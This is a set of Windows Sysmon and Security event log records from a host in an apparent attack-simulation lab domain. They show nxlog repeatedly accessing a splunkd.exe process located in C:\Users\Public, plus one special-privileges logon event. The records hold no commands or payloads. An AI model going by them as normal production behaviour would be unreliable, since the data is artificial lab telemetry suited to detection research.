{"EventTime":"2020-08-01 06:58:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:23.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:23.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:24.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:24.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:25.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:25.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:26.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:26.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:27.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:27.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:28.551\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:28.551","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220672,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x96546\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x96546","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:58:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
